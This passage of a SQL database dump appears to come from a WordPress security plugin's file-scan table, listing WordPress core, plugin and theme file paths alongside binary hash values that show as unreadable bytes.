\0','�\nS�{U��Cdz$����y���a|8�[','',0,'?'),('�-^*������ap�','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-renderer.php',0,'V}d��T�ܧ�C\"º','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('���2�ގʗ�^�/','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/fancy-type/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F&�8{8��Z�\'6\n','Wn��=\"~�T%����xj�rt����e����','',0,'?'),('����KqM���{���','wp-admin/css/dashboard.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3T8�orO�0�t=+Z%','������D�E����bF��Xx騞���','',0,'?'),('��sݜ�Þ3�����','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��7Ih�!���_�','�y�۹�����������!�H���HGH','',0,'?'),('�{xZ�c�\"�hb�?�','wp-includes/js/dist/dom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+t��<\n�~��G��_',':ٽ�3��ߖY���<U�9F��Q1�����_�','',0,'?'),('�TB��O>�v2��}Ea','wp-includes/SimplePie/Locator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('�1��(����oi��)','wp-includes/wp-includes/js/jquery/ui/effect-bounce.min.js',0,'��k�&�@��ڧrZ','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��W�MF`3��$��','wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y^�������','Y	Q�FX��2�2�FW���)���fKSf�','',0,'?'),('��*�7\r��?�','wp-includes/class-requests.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@�?i� Xc����','���$��\r7�U���M����]���g6‡�>C','',0,'?'),('�����c�3�9��[�','wp-includes/wp-includes/js/imagesloaded.min.js',0,':Vu+sf5�i����',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('L��e`d�˻��W','wp-content/plugins/wp-cerber/assets/flags/je.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�l1�r$~�A�)','wp-content/plugins/wp-cerber/assets/flags/as.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�/����Z�3�','��UŰ�\r�^�W�}�Ux\"�C�@�Scu�l','',0,'?'),('�of?�3�P�1�\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g\"̤/O���Y��\'','�8�e�T�et\r j�P�/��J���<^�rӥz','',0,'?'),('B�]���|bu�','wp-includes/wp-includes/class-smtp.php',0,'.斚a�q�ݓϠ����','.斚a�q�ݓϠ����','B)HJ����ڐ�R�ps� ����	+\'8k_','',0,'?'),('F��e���}�(��','wp-includes/js/jquery/ui/dialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('N�\0f��~;I���','wp-content/plugins/wp-cerber/assets/flags/bm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��g��¶Mn�z�','��<������@ H�*��eթ�G�)�-CIԲ^','',0,'?'),('S,`u/X���O\\%�','wp-content/themes/shootingstar/functions/about/images/arrow_right_expanda.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�غY&%�$W�%4K','��f.�y27T���1p�dG��Z���r0�]�','',0,'?'),('i1��E~N�I�A͔��','wp-includes/Requests/Cookie/Jar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0_��&p��\"4�\\�','c��!�#B�i*+\"�\r�n���Iƈ�XÉ��w�','',0,'?'),('i~AV�GZ=u�9�','wp-includes/wp-includes/js/quicktags.js',0,':}���҈P��٭�',':}���҈P��٭�','=���/���f2A|��d���<��z�N�K=�','',0,'?'),('s♼{DR�[�k�1�I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zF��ހW�\rl�~6','V�{��Q9�V	����J	X�q���ڀc�','',0,'?'),('��W@�|.0�]�*��','wp-includes/wp-includes/block-supports/align.php',0,'v(\0����1�i�`','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('����X/��\0��	','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','On�4�r���\'f=','�b�����*�9Y�[]�\rᕂ\'�yԩ�e��','',0,'?'),('�N3M�\n��S��0j','wp-includes/js/dist/block-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O� �U�T$`��8C','�q���X|���6C�_PT�YA�r�[�','',0,'?'),('���(g�N\\��\'�W�','wp-content/themes/sg-window/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r���V+jV���U�f�','�����}V��V��\'V����r���Ys��','',0,'?'),('ʳ9S5�z֏�\r_�','wp-includes/wp-includes/js/jquery/ui/resizable.min.js',0,'c0�N^�l�����L��','c0�N^�l�����L��','�~��i�{Q���ԯ��֕���YdF�w\r,�Ϲ','',0,'?'),('�x(�ťܺ�.���Շ','wp-includes/class-wp-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9]�K�UJW�*��h�=','���4�\ZQuA^ء��j򬪎$M��0�\0','',0,'?'),('Ԓ��A����r��^','wp-includes/js/wp-custom-header.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,�!�ڊLӺ~ν7�','��E�zk;3K�*X$���i���q��n��','',0,'?'),('�^0p����k����M','wp-includes/css/dist/nux/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ip����8\0p���','���������3Bk~�x*N���K}�mǧ߸n�','',0,'?'),('�S	����g	N�d','wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6_DB��NI�9���Ŷ�','���~DIb�xb{�IdO�.C�����:z/�D5�','',0,'?'),('���h]��C���A*','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'I�˞aFtz\\�Ǯ','���Ҭ�\ZADs���5����?���D�A/<�:','',0,'?'),('�0ܚ�Z�I�丱N','wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U巃�� qD�F��H','���Ԧ�!���ӢtL�k.�\"1��Cm�Kg�','',0,'?'),('��X��ߴ�3�P�G','wp-includes/wp-includes/Requests/Exception/HTTP/504.php',0,'�m�̪Db� ��*�','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('�3ƹܕj�bi�Υ�','wp-includes/customize/class-wp-customize-nav-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('�	wE��r��} �','wp-content/plugins/wp-cerber/assets/flags/gq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׾�\r�>.ⶱ���G','�d����^f�r��=�mM���Y��,���','',0,'?'),('7D�4iY�2�KO�\Z\Z','wp-includes/wp-includes/customize/class-wp-customize-site-icon-control.php',0,'�$0V�����<','�$0V�����<','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),('D�1�a��e��r�','wp-includes/wp-includes/css/media-views.min.css',0,'w�\0�]������	�-','w�\0�]������	�-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('b���E�����4t=','wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̻o��wG>p','�I�`I^{�Pנh�Q��e:sG^��8�sĚ','',0,'?'),('{v�\\p ��F*�.8','wp-includes/wp-includes/js/jquery/ui/effect.min.js',0,'�8�b�N���\nk!?','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('������5�ފVV','wp-includes/wp-includes/js/dist/shortcode.js',0,'��ʼ�����|���U','��ʼ�����|���U','��9j�Z�-�T�(�(�kC�����r�uS�','',0,'?'),('��,‚=9���h�6K�','wp-includes/js/jquery/ui/draggable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:2��g9�tL�D�','��Cu�o.t�?�xd�x�CK�6�Ηp_�','',0,'?'),('�/��҄p���d͟<','wp-includes/wp-includes/query.php',0,'O���o�y&���u','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('���\n�r�)�M�f','wp-includes/wp-includes/class-wp-http-streams.php',0,'Oo�֪$N�~�F0�ۂ','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ņ#�8%��]�f���','wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php',0,'vr���Β;Y���o$Y','vr���Β;Y���o$Y','�����}� Y�1q$VY�8k\rt �o�ny�w�','',0,'?'),('�0���զ����','wp-content/plugins/wp-cerber/assets/flags/gw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qWM����f2�c','d�n�;L�m%��\"NA�oZE!���J�_͆�','',0,'?'),('�&UX\r�L4{����','wp-includes/js/utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��0�`ߣ���MVi`','�js�@Vna�v�t\'ȀD��,݆���T;','',0,'?'),('��ԞX�[�`?��^','wp-includes/block-patterns/large-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`���3��\0�]j6?>','��b�`&h�2��)V�KF}Ո�m�?*f�搭','',0,'?'),('\Z֧��\\\Z�h�i','wp-includes/js/dist/blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|@^f^,x2�B�� ','��J��r°�gȫ~�H�?pX���T���\\п�M','',0,'?'),('\ZO�3F5K�;�@ �','wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�q\\�}����[�','�[�T�n�Ejd�(�$�:!�h�Ν\0�s�><','',0,'?'),('\Z&�cR�< FiC�','wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƥܐ�W^�[�g�','�dL�����cK~=0jE�]�����~\"�','',0,'?'),('\ZL�MS~�d�,T�7��','wp-includes/wp-includes/images/media/code.png',0,'-o��Uʓ��U�U_','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('\ZN\Z�`i̳%�ج0','wp-content/plugins/wp-cerber/assets/flags/cn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���-V�|֬S���','j�_�\r49�>�x+E�X��H��dF���K�`','',0,'?'),('\Zn�8x]t����U�>�','wp-includes/wp-includes/wp-diff.php',0,' ��-x�<�z^�Wet',' ��-x�<�z^�Wet','�a��;�ɺ��*2Z��f1��\"�\n�Nt~�>��','',0,'?'),('\Z��_eym�\Z�v��/\\','wp-content/plugins/wordfence/modules/login-security/js/admin-global.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LgD5w\'|�IGV��5','�}њ@�PF�)M���$��j���p{e','',0,'?'),('\Z�����L6N�1�;8�','wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"���w^\n���k�6','�!�5�@�a�6t�o�5(D�s���\n��K�f','',0,'?'),('\Z�\Z!@%�U�鏂�Yq�','wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js',0,'ZZb&\'���C����','ZZb&\'���C����','���{���E�#G�`T`��4��4ܯ��','',0,'?'),('\Z��� 1�/c���:!','wp-includes/wp-includes/SimplePie/Cache/MySQL.php',0,'�) ��fz���C�0�','�) ��fz���C�0�','	��W��A��2Lh�`���i�%iv�2���޴','',0,'?'),('\Z�;5�(��O�O�R�','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ǜ����lm�D!','�\'�9�\r9�\0o|��\Z������|����0K','',0,'?'),('\ZŴԭ�xvw�E\nv','wp-content/plugins/wp-cerber/assets/flags/mk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���Zx��e��','Ŷv�ew��s��֝�wx�YԌ[@eQ�C�j','',0,'?'),('\Z�`��c�\"�q]��\'O6','wp-content/plugins/wordfence/js/wfi18n.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i&XDE���p/N�','GU	��*��k�P,�:�?+}x�Hb�5���#�','',0,'?'),('\Z�v���M_�6p�ue�','wp-includes/wp-includes/css/dist/components/style-rtl.css',0,' ��y�T�����&]H|�',' ��y�T�����&]H|�','RU\Z����[�^͝�/��a��/�9�\0�x��','',0,'?'),('\Z�Z��a�84��ǵ','wp-includes/wp-includes/js/dist/blob.min.js',0,'eLi���7�Mq\nk��','eLi���7�Mq\nk��','ZF�}��bgHCk��]��`�E|k�nW�','',0,'?'),('\Z��{l46-��jT99','wp-content/plugins/wordfence/js/knockout-3.3.0.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��B8lc^��','5�J�9h��ALg��@�`�uw�o��3��\0I>','',0,'?'),('\Z����)qtsCI9','wp-includes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�����8�B��=^�','�u���6`�8ԻJLM��|�.�m�O5','',0,'?'),('\Z�r��Nl��\'��7M�','wp-content/themes/sg-window/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ů��g(v��	/','�B��Ta��).���5�������ŕ������','',0,'?'),('\Z�y��8R#O�y��','wp-admin/css/nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+f~�Da�أv|�/�','%tK�r���t��M��b��n:�a����>E','',0,'?'),('\Z��*����7O�4JB�','wp-includes/wp-includes/Requests/Hooks.php',0,',�� ���gx�i���',',�� ���gx�i���','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('\Z��\Z:\\��Rf�P�~3','wp-includes/class-wp-metadata-lazyloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I^�P���;$�+\"�','^2��)E>X���4�:��U&�߳;���!e','',0,'?'),('\Z�UE�s(��#E�p','wp-includes/images/smilies/icon_mrgreen.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$_��u�X|I%~$','!B���I1�mV�-���|ј�X5D�8���h�','',0,'?'),('\Z���/�̓��T%�g4','wp-includes/js/jquery/ui/effect-drop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���閴�u)�B���1�','��v��h��d���L�V�y􅊖�^n\"�ّ\0]p�','',0,'?'),('Ҿ�x�P;�+2�/�?','wp-includes/wp-includes/js/jquery/ui/effect-shake.min.js',0,'1�̎�X�!��-�U��','1�̎�X�!��-�U��','�.��,�e=~[�Y�p�x�\"��o�?v��#��','',0,'?'),('$�P�`��\0g�X�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yF“\\����2���','2k�s��\\>��RI:nH�ȿDm�!zz���','',0,'?'),('-��c�<���@�VsZ�','wp-includes/js/api-request.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����߿G7p6{�g','�d�6Q\\����f�:�����G`��j1V�','',0,'?'),('k����7|d����T;','wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�t�J��?&B�I�_�','D*��\nS��A�w��5e�\Z��ӔM2���','',0,'?'),('��<_zˁ���>㝄','wp-includes/wp-includes/random_compat/random_bytes_dev_urandom.php',0,'��d�����\ZHr�','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('�y���!�\0pZ�[A','wp-includes/js/mediaelement/mediaelement-and-player.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�s�‹�=����\0','wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('��E�ȖqȊ?2�H�','wp-includes/js/dist/api-fetch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y���p���n���/5','�4/�W~s	U��9i@w�C�O\"4���','',0,'?'),('��<b���!ž�','wp-content/plugins/wp-cerber/assets/flags/ge.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Aw�J#ܿ�d��F','��6��o�M�X��ݕ�D���֖M�+','',0,'?'),('ֻE\n�<�B�[�,','wp-includes/class-wp-ajax-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6�)�Q�\"Sσt�.H�','��[��$���g�nM!^\\���9t�t��>Z�','',0,'?'),('��Y�Ab�))�O�s','wp-includes/wp-includes/sodium_compat/src/SodiumException.php',0,'�HDf��ae���z��R','�HDf��ae���z��R','㶜\\��L>L�N-@G\'��tmG��i��kR߮g\0','',0,'?'),('���(l�8y\n&','wp-includes/wp-includes/css/dist/editor/style.min.css',0,'հv��}�Ifs��>�','հv��}�Ifs��>�','�J����Tc68H�\Z�s\'9]�6�p���4d','',0,'?'),('�m��n9�F�6�','wp-admin/css/admin-menu-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i�0.���f��','C�X�R�\Z��)GU+LA�� �$�:�1�e�','',0,'?'),(')�M��^�ûoz�','wp-admin/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�ל�x>c������¢','�<\0Ѕҩ��هqU%��G��7r�\\�*��2J','',0,'?'),('.�c\r��xz�-�c=�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',0,'Ջ}��B��H��71','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('4%�IH�O��ʰ�L','wp-includes/css/media-views.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\0�]������	�-','�{&B>�:]�\n��a��m����c�[zk!�','',0,'?'),('C�/�;)��ّ�o','wp-admin/js/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xc�T��#�Δ�(�','�Pi<l��D%�J{d�w�������5/','',0,'?'),('H��~�\n��x����|','wp-includes/js/dist/token-list.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��͒V�&8\07X','FEb+��`��\\Ձ��� �4�]D�s�}�\Z','',0,'?'),('T�gslF��ʞ�Ly','wp-admin/js/set-post-thumbnail.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�P�N�H�9e�@I','e}#����n�q�J�rJ��Q<d��Z�K�4','',0,'?'),('Y ����S��z�X^','wp-content/plugins/wp-cerber/assets/flags/bj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��̂(,�ߨP}r��','�`	�U�Y�ģ���Ç�/�5��T��\"5','',0,'?'),('a�@�WrQw��Z\n.�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ܑz�g<N��\n?o6f','���R����Eg�X3��JAc��!a�_��S{','',0,'?'),('z�|*6�S\\5��3','wp-content/plugins/wordfence/lib/wordfenceScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l2�Ǘ�yf[CZ߈G','H׶�mb�(���f�>MX��=�W��|��ٿx','',0,'?'),('{mt+.\'\r���:�*','wp-includes/wp-includes/css/editor.min.css',0,'p^�,f�ޡ�����I{�','p^�,f�ޡ�����I{�','��i�4�j�v�J5�d���߲TP��L�/��7�','',0,'?'),('�&_�\\l=��L���','wp-includes/wp-includes/Requests/Exception/HTTP/416.php',0,'�1�N9�ɪ�a�Dx�','�1�N9�ɪ�a�Dx�','�(��mybV�aI�jWp���(!A����<(�X','',0,'?'),('�Ʒ4�/�;����','wp-includes/wp-includes/js/dist/api-fetch.min.js',0,'B��p=(mV�2��_a','B��p=(mV�2��_a','G�y���л\r��7�5���d������R��','',0,'?'),('�\n$z�X�`�1Bw','wp-includes/js/tinymce/plugins/charmap/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\��5^����','[�B�\Z,;��j�fe�MU�j|)�rv��>U�F','',0,'?'),('��=b�6��hs���t','wp-admin/ms-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:1R]	l�I��!#_J','7�E��H����Pu�����Z�b��G','',0,'?'),('��\'��FE�A�vQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r��5]xVI�\'�i�','��G��݅\'�!���Y�E�3��P5ad��M��','',0,'?'),('�^�u[�p}`B��W1','wp-includes/blocks/table/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����̀)#\rS� ��','�q#�.Z!�g�l���讍T�\0�u�\'EA�?�','',0,'?'),('�$��bQ\'�n�0?','wp-includes/wp-includes/block-patterns/three-buttons.php',0,'��ǟ�(	aL�)�m','��ǟ�(	aL�)�m','\r��)��k���O�dS0�X�z���_����','',0,'?'),('��Nk��DR���ng#�','wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php',0,'�8x$�9�hQ&�','�8x$�9�hQ&�','n~��B�Ȳ���|�4�[�U�`\0�2�J۷�','',0,'?'),('��º��\06�R&q','wp-content/plugins/wp-cerber/assets/flags/lc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?x2\Zˁ%��*�','��dV��d����5�w$�E�,Ư�{l','',0,'?'),('�k0B��a��`�','wp-includes/customize/class-wp-customize-nav-menu-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('ػȯ�S#���yj','wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php',0,'�5O&?��E�	��%','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('����^�cm]�s~','wp-content/plugins/wp-cerber/nexus/cerber-nexus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ced]@�>�t�Ɇ��','JSu�j�F#�e��҇p�U�a�;�S�','',0,'?'),('ܟ�ҿB∶����','wp-includes/js/dist/media-utils.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UJ҃�iOķ}��`�','Ҋ���M�#,���HӬ\\f�C|xn���W:','',0,'?'),('�-=Q�Cw�tnL�#','wp-content/plugins/wordfence/lib/wfBrowscap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r�e.�����b��','�Hz�n���O�#�/�t�ɚ\"���U ���A�i�','',0,'?'),('�N�đG�����','wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php',0,'��/Dzx��ǂ��','��/Dzx��ǂ��','���,�����E���{��0/m�a�X�i���','',0,'?'),('\n��O�_��;]/^��','wp-includes/images/down_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V�~�o�YnG~_u','��h�8ɧ���p�u�{�9������J���','',0,'?'),('ν�}�V�+�tB�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��꤀�x�٠�%�cl','N�8,�c����ae����Οi<5p$���','',0,'?'),('G_bc�.,]&���','wp-admin/js/image-edit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\'�L�\n�r�)�L','o9J�B�{2[�Je\r����@q��ؘ�Դ�lD�','',0,'?'),('Kv�$T�MR����=�','wp-includes/css/dist/edit-post/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����n	�VQ�H��','Y��^�Up���yx.ΕP��\0���\Z�����','',0,'?'),('J�*\\,R�ģ�}j','wp-includes/wp-includes/widgets/class-wp-widget-media.php',0,'�m�����O���\\��','�m�����O���\\��','�b�Z�r��A��{�_���d���5|','',0,'?'),('}ƿ߲��2�P���','wp-content/themes/sg-window/taxonomy-jetpack-portfolio-tag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ޙNׯ&IQ{sm�� �','�����2��6�8�̓�-�A���̈7�	���','',0,'?'),('&�\\�Xukq�)��/','wp-content/themes/sg-window/img/icons/small/wordpress.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nz����m�2�a`��\r',']}��A�&��-yæ=\Z]v\"�Y�ES{�.5','',0,'?'),('Kg\Z�P�F\\�,�f','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),(']���(�7�^����U','wp-content/plugins/wp-cerber/assets/flags/zw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^�~����E,Tl','S��Y�2�r�5��S�a�J�\"��tJ�@ArC�','',0,'?'),('fMx���	�+9�U�','wp-admin/js/customize-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��›|���\Ze�+J~','��h��v�ԲF:�Zؿ�Bd`����Y���','',0,'?'),('l��g.N��\ZK\Z�-','wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js',0,'9\'�Q8b�/����a�','9\'�Q8b�/����a�','�3t\\R>��_a��>�\0��|ՑVC�䦇OB','',0,'?'),('o?*a���ni���\n','wp-includes/wp-includes/canonical.php',0,'��G��o<����ݏ�','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('v`�D\\\r;ǒ�h�2','wp-content/themes/sg-window/img/icons/delicious.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����jK��<!�z��k','e�.w�vͭK��K���N�l�R,�$�<W1��','',0,'?'),('�%��\\��MA����','wp-admin/images/wordpress-logo-white.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��qP�C��-SPD�','e�4�E��?�&�DsA���ʬ�;�)@�Xɒ','',0,'?'),('����J�}F��E\0�9�','wp-content/themes/index.php',0,'gD,V�=\\�bP','gD,V�=\\�bP','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�=�}C���i��HT','wp-admin/network/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�3���@%�c ','�\\H�.7���7QtUw�ݰAK,�$A��!��Lz','',0,'?'),('��g+������,c�','wp-includes/block-supports/colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ef�1!9vC8�:(��\'','Uc�OТ��0;�[�z\'��أdP��+�j���0','',0,'?'),('�g��I�!٭���_�','wp-includes/ms-blogs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YYw_s簃@	DE�m','�~ۃG��,,?��0��v��f��UӧN��iK','',0,'?'),('���t�DX�m\0#�(�','wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��]/~���q��XŎE','wp-includes/js/jquery/ui/button.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�qz�uo�>���','8�v�J.�OA�z��A)�HJe�f�B�,��z','',0,'?'),('���L?\n�\n���x��@','wp-content/plugins/wp-cerber/assets/flags/al.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#����S�{r<�','����G�U0<>�.]fX�[I���\0����7','',0,'?'),('�6���Ab���k�','wp-includes/wp-includes/class-wp-editor.php',0,'�s��\'+���������L','�s��\'+���������L','/%�k�\r<���&u�NKI�v���GrA��','',0,'?'),('�3������܎�J�','wp-includes/wp-includes/ms-blogs.php',0,'YYw_s簃@	D